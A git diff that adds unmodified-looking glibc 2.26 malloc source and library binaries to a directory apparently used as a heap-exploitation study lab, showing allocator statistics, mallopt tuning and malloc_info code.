+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
+  ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_check_action, 2, value, check_action);
+  check_action = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM,
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
+{
+  /* Avoid using this arena in future.  We do not attempt to synchronize this
+     with anything else because we minimally want to ensure that __libc_message
+     gets its resources safely without stumbling on the current corruption.  */
+  if (ar_ptr)
+    set_arena_corrupt (ar_ptr);
+
+  if ((action & 5) == 5)
+    __libc_message (action & 2, "%s\n", str);
+  else if (action & 1)
+    {
+      char buf[2 * sizeof (uintptr_t) + 1];
+
+      buf[sizeof (buf) - 1] = '\0';
+      char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
+      while (cp > buf)
+        *--cp = '0';
+
+      __libc_message (action & 2, "*** Error in `%s': %s: 0x%s ***\n",
+                      __libc_argv[0] ? : "<unknown>", str, cp);
+    }
+  else if (action & 2)
+    abort ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   heap->size, heap->mprotect_size);
+	  total_aspace += heap->size;
+	  total_aspace_mprotect += heap->mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __cfree) weak_alias (__libc_free, cfree)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.26/ld-2.26.so b/HeapLAB/.glibc/glibc_2.26/ld-2.26.so
new file mode 100755
index 0000000..c1910a6
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.26/ld-2.26.so differ
diff --git a/HeapLAB/.glibc/glibc_2.26/ld.so.2 b/HeapLAB/.glibc/glibc_2.26/ld.so.2
new file mode 120000
index 0000000..82c5fee
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.26/ld.so.2
@@ -0,0 +1 @@
+ld-2.26.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.26/libc-2.26.so b/HeapLAB/.glibc/glibc_2.26/libc-2.26.so
new file mode 100755
index 0000000..a958085
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.26/libc-2.26.so differ
diff --git a/HeapLAB/.glibc/glibc_2.26/libc.so.6 b/HeapLAB/.glibc/glibc_2.26/libc.so.6
new file mode 120000
index 0000000..898455f
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.26/libc.so.6
@@ -0,0 +1 @@
+libc-2.26.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.26/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.26/malloc/malloc.c
new file mode 100644
index 0000000..54e406b
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.26/malloc/malloc.c
@@ -0,0 +1,5655 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2017 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summmaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifdef NDEBUG
+# define assert(expr) ((void) 0)
+#else
+# define assert(expr) \
+  ((expr)								      \
+   ? ((void) 0)								      \
+   : __malloc_assert (#expr, __FILE__, __LINE__, __func__))
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
